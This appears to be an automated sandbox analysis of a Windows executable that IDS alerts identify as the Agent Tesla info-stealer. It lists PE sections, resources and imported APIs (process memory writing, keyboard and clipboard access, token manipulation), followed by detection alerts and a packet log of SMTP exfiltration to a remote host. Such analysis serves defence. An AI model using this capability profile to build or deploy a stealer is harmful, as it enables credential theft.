                                            mov dword ptr [ecx+04h], 0049FDF8h
                                            mov dword ptr [ecx], 0049FDF0h
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            push esi
                                            push dword ptr [ebp+08h]
                                            mov esi, ecx
                                            call 00007F4A68B24C1Ah
                                            mov dword ptr [esi], 0049FE0Ch
                                            mov eax, esi
                                            pop esi
                                            pop ebp
                                            retn 0004h
                                            and dword ptr [ecx+04h], 00000000h
                                            mov eax, ecx
                                            and dword ptr [ecx+08h], 00000000h
                                            mov dword ptr [ecx+04h], 0049FE14h
                                            mov dword ptr [ecx], 0049FE0Ch
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            push esi
                                            mov esi, ecx
                                            lea eax, dword ptr [esi+04h]
                                            mov dword ptr [esi], 0049FDD0h
                                            and dword ptr [eax], 00000000h
                                            and dword ptr [eax+04h], 00000000h
                                            push eax
                                            mov eax, dword ptr [ebp+08h]
                                            add eax, 04h
                                            push eax
                                            call 00007F4A68B2780Dh
                                            pop ecx
                                            pop ecx
                                            mov eax, esi
                                            pop esi
                                            pop ebp
                                            retn 0004h
                                            lea eax, dword ptr [ecx+04h]
                                            mov dword ptr [ecx], 0049FDD0h
                                            push eax
                                            call 00007F4A68B27858h
                                            pop ecx
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            push esi
                                            mov esi, ecx
                                            lea eax, dword ptr [esi+04h]
                                            mov dword ptr [esi], 0049FDD0h
                                            push eax
                                            call 00007F4A68B27841h
                                            test byte ptr [ebp+08h], 00000001h
                                            pop ecx
                                            Programming Language:
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x655a0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x13a0000x7594.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0xd40000x655a00x65600be3fe9117d75d2aeb01765f329d88f3aFalse0.6000428676017263data6.690395362291765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x13a0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xd45d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                            RT_ICON0xd47000x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                            RT_ICON0xd48280x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                            RT_ICON0xd49500xc35PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.87456
                                            RT_ICON0xd55880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.023852478410031942
                                            RT_ICON0xe5db00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.019261088921589238
                                            RT_ICON0xef2580x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.03022181146025878
                                            RT_ICON0xf46e00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.029168634860651865
                                            RT_ICON0xf89080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.03973029045643153
                                            RT_ICON0xfaeb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.06941838649155722
                                            RT_ICON0xfbf580x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.1168032786885246
                                            RT_ICON0xfc8e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.16932624113475178
                                            RT_MENU0xfcd480x50dataEnglishGreat Britain0.9
                                            RT_STRING0xfcd980x594dataEnglishGreat Britain0.3333333333333333
                                            RT_STRING0xfd32c0x68adataEnglishGreat Britain0.2735961768219833
                                            RT_STRING0xfd9b80x490dataEnglishGreat Britain0.3715753424657534
                                            RT_STRING0xfde480x5fcdataEnglishGreat Britain0.3087467362924282
                                            RT_STRING0xfe4440x65cdataEnglishGreat Britain0.34336609336609336
                                            RT_STRING0xfeaa00x466dataEnglishGreat Britain0.3605683836589698
                                            RT_STRING0xfef080x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                            RT_RCDATA0xff0600x39fb2data1.0003410669922943
                                            RT_GROUP_ICON0x1390140x84dataEnglishGreat Britain0.7272727272727273
                                            RT_GROUP_ICON0x1390980x14dataEnglishGreat Britain1.25
                                            RT_GROUP_ICON0x1390ac0x14dataEnglishGreat Britain1.15
                                            RT_GROUP_ICON0x1390c00x14dataEnglishGreat Britain1.25
                                            RT_VERSION0x1390d40xdcdataEnglishGreat Britain0.6181818181818182
                                            RT_MANIFEST0x1391b00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                            DLLImport
                                            WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                            MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                            WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                            PSAPI.DLLGetProcessMemoryInfo
                                            IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                            USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                            UxTheme.dllIsThemeActive
                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                            USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                            GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                            SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                            OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishGreat Britain
                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                            2024-07-26T15:12:33.296540+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49739587192.168.2.4148.66.136.151
                                            2024-07-26T15:14:13.755916+0200TCP2840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249748587192.168.2.4148.66.136.151
                                            2024-07-26T15:11:56.171178+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973840.68.123.157192.168.2.4
                                            2024-07-26T15:11:17.788023+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973240.68.123.157192.168.2.4
                                            2024-07-26T15:12:30.761942+0200TCP2840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249731587192.168.2.4148.66.136.151
                                            2024-07-26T15:11:04.562261+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49731587192.168.2.4148.66.136.151
                                            2024-07-26T15:13:30.681219+0200TCP2840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249744587192.168.2.4148.66.136.151
                                            2024-07-26T15:13:01.501242+0200TCP2840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249742587192.168.2.4148.66.136.151
                                            2024-07-26T15:14:51.697303+0200TCP2840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249757587192.168.2.4148.66.136.151
                                            2024-07-26T15:13:30.674764+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49744587192.168.2.4148.66.136.151
                                            2024-07-26T15:14:33.795058+0200TCP2840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249751587192.168.2.4148.66.136.151
                                            2024-07-26T15:14:51.690852+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49757587192.168.2.4148.66.136.151
                                            2024-07-26T15:14:33.786282+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49751587192.168.2.4148.66.136.151
                                            2024-07-26T15:14:13.749702+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49748587192.168.2.4148.66.136.151
                                            2024-07-26T15:12:33.303757+0200TCP2840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249739587192.168.2.4148.66.136.151
                                            2024-07-26T15:13:47.556689+0200TCP2840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249746587192.168.2.4148.66.136.151
                                            2024-07-26T15:13:47.550653+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49746587192.168.2.4148.66.136.151
                                            2024-07-26T15:13:01.495219+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity49742587192.168.2.4148.66.136.151
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 26, 2024 15:10:59.271194935 CEST49730443192.168.2.4172.67.74.152
                                            Jul 26, 2024 15:10:59.271234989 CEST44349730172.67.74.152192.168.2.4
                                            Jul 26, 2024 15:10:59.271305084 CEST49730443192.168.2.4172.67.74.152
                                            Jul 26, 2024 15:10:59.281647921 CEST49730443192.168.2.4172.67.74.152
                                            Jul 26, 2024 15:10:59.281658888 CEST44349730172.67.74.152192.168.2.4
                                            Jul 26, 2024 15:10:59.760307074 CEST44349730172.67.74.152192.168.2.4
                                            Jul 26, 2024 15:10:59.760394096 CEST49730443192.168.2.4172.67.74.152
                                            Jul 26, 2024 15:10:59.764072895 CEST49730443192.168.2.4172.67.74.152
                                            Jul 26, 2024 15:10:59.764081001 CEST44349730172.67.74.152192.168.2.4
                                            Jul 26, 2024 15:10:59.764405012 CEST44349730172.67.74.152192.168.2.4
                                            Jul 26, 2024 15:10:59.814842939 CEST49730443192.168.2.4172.67.74.152
                                            Jul 26, 2024 15:10:59.834863901 CEST49730443192.168.2.4172.67.74.152
                                            Jul 26, 2024 15:10:59.876514912 CEST44349730172.67.74.152192.168.2.4
                                            Jul 26, 2024 15:10:59.944881916 CEST44349730172.67.74.152192.168.2.4
                                            Jul 26, 2024 15:10:59.945039034 CEST44349730172.67.74.152192.168.2.4
                                            Jul 26, 2024 15:10:59.945105076 CEST49730443192.168.2.4172.67.74.152
                                            Jul 26, 2024 15:10:59.951812029 CEST49730443192.168.2.4172.67.74.152
                                            Jul 26, 2024 15:11:00.438677073 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:00.443572998 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:00.443634033 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:02.128794909 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:02.129010916 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:02.134150028 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:02.544971943 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:02.546133995 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:02.550960064 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:03.053626060 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:03.053978920 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:03.058794022 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:03.455396891 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:03.455651999 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:03.461087942 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:03.806952953 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:03.807351112 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:03.814574957 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:04.206845045 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:04.207043886 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:04.212106943 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:04.561624050 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:04.562212944 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:04.562261105 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:04.562280893 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:04.562289953 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:11:04.567924976 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:04.567933083 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:04.567939997 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:04.567945957 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:12.274554968 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:11:12.330533028 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:30.201312065 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:30.202692986 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:30.207778931 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:30.209851027 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:30.209918976 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:30.760234118 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:30.761941910 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:30.762605906 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:30.762653112 CEST49731587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:30.767678022 CEST58749731148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:31.101262093 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:31.102411032 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:31.107467890 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:31.466768980 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:31.466912985 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:31.472664118 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:31.821348906 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:31.821567059 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:31.826491117 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:32.195847988 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:32.195981979 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:32.200850010 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:32.546055079 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:32.548639059 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:32.553420067 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:32.938636065 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:32.938827038 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:32.945694923 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.295046091 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.296466112 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.296500921 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.296540022 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.296564102 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.297550917 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.301523924 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.301595926 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.301605940 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.301664114 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.302052975 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.303695917 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.303751945 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.303756952 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.303764105 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.303806067 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.303838015 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.303888083 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.303911924 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.303924084 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.303963900 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.303982973 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.304028988 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.304043055 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.304054022 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.304099083 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.307044029 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.307096004 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.309071064 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.309082031 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.309129953 CEST49739587192.168.2.4148.66.136.151
                                            Jul 26, 2024 15:12:33.310595989 CEST58749739148.66.136.151192.168.2.4
                                            Jul 26, 2024 15:12:33.310687065 CEST49739587192.168.2.4148.66.136.151
